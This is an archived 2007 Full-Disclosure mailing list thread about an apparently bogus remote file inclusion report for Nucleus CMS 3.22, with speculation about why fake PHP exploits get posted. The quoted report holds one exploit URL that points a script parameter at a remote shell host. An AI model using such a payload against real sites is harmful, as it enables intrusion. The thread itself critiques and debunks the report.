full-disclosure-uk May 2007 archive

Re: [Full-disclosure] nucleus 3.22 >> RFI

From: evilrabbi <evilrabbi_at_nospam>
Date: Tue May 08 2007 - 13:18:44 GMT
To: full-disclosure@lists.grok.org.uk


I like the idea they are all terrorists passing secret messages in fake exploits.
/me waits on the Tom Clancy movie

On 5/7/07, Ron Superior <rsuperior@gmail.com> wrote:
>
> Hi folks,
>
> Some months back I seem to remember people hypothesizing as to the
> real purpose behind some of these particularly lame fake PHP exploits.
> You know the ones I mean; they're mostly remote file includes, they
> often are decorated with some simple ASCII art, and the "thanks" and
> "greetz" sections are always loaded with names that suggest Turkish or
> other Middle Eastern origin.
>
> The two most interesting suggestions that I recall were:
>
> 1) Somebody wanted to pump up the lists with PHP exploits so they
> could claim later that some large number X of PHP vulnerabilities had
> been posted to FD since some date.
>
> 2) Covert communication, or that the "exploits" were really secret
> messages between t3rr0ri$ts or something.
>
> I'm sure there exists a motive beyond just spamming us to be
> annoying. Anyone have any new ideas, or good arguments for either of
> the above two ideas?
>
> Ron
>
> Guasconi Vincent wrote:
> > On 5/6/07, security curmudgeon <jericho@attrition.org> wrote:
> >> : VENDOR :http://nucleuscms.org/
> >> : BY : s3rv3r_hack3r (hackerz.ir admin)
> >> : bug:
> >> : nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php');
> >> : Exploit:
> >> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
> >>
> >> I haven't examined the source code to this, but on June 16, 2006,
> >> gamr-14@hotmail.com disclosed RFI vulnerabilities [1] in four Nucleus
> >> scripts, all with the DIR_LIBS variable as the injection point. This was
> >> subsequently proven to be a false report as the variable was previously
> >> set and could not be manipulated by an attacker.
> >>
> >> Have you actually tested this, or is this based on a quick grep of the
> >> source code?
> >
> > They're like bots now.
> > They didn't hear you, and you can't stop them.
> >
> > Try a spam rule.
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-- -- h0 h0 h0 -- www.nopsled.net
